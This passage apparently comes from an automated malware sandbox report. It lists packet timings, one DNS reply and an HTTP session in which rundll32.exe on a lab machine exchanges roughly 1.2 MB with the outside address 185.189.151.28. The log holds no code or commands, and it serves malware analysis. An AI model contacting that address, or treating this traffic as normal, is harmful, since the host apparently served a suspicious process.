May 4, 2022 16:27:54.005594015 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.005621910 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.005697966 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.005723000 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.005742073 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.005747080 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.005765915 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.005770922 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.005779028 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.005795002 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.005808115 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.005812883 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.005829096 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.005844116 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.005853891 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.005897999 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.005919933 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.005958080 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.005959034 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.005975008 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.005995989 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.006007910 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.006391048 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.006419897 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.006438017 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.006474972 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.006477118 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.006503105 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.006515026 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.006526947 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.006536007 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.006551981 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.006568909 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.006570101 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.006594896 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.006607056 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.006653070 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.006700039 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.006701946 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.006725073 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.006738901 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.006748915 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.006763935 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.006772995 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.006776094 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.006798029 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.006812096 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.006817102 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.006836891 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.006850004 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.006988049 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007011890 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007035971 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007045984 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.007060051 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007066011 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.007082939 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007093906 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.007107019 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007117033 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.007124901 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007128000 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.007148981 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007164955 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.007174015 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007186890 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.007196903 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007220984 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007229090 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.007246017 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007266998 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.007271051 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007288933 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007308960 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.007361889 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.007400990 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007426023 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007448912 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007452965 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.007467031 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007505894 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.007534981 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.007584095 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007607937 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007631063 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007664919 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007689953 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007705927 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.007713079 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007733107 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.007739067 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007755995 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.007764101 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007787943 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007791042 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.007812023 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007817030 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.007834911 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007843018 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.007859945 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007864952 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.007883072 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007894993 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.007900953 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007925987 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007931948 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.007940054 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.007951021 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007967949 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.007977009 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007997036 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.008001089 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.008018970 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.008024931 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.008049965 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.008058071 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.008074045 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.008074045 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.008097887 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.008107901 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.008119106 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.008122921 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.008142948 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.008143902 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.008167982 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.008192062 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.122081995 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.139204979 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.411616087 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.411673069 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.411736965 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.411773920 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:28:50.846771955 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
May 4, 2022 16:27:33.081885099 CEST | 8.8.8.8 | 192.168.2.4 | 0xd133 | No error (0) | 13.107.43.16 | A (IP address) | IN (0x0001) |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.4 | 49769 | 185.189.151.28 | 80 | C:\Windows\SysWOW64\rundll32.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
May 4, 2022 16:27:53.231327057 CEST | 1212 | OUT | |
May 4, 2022 16:27:53.534866095 CEST | 1213 | IN |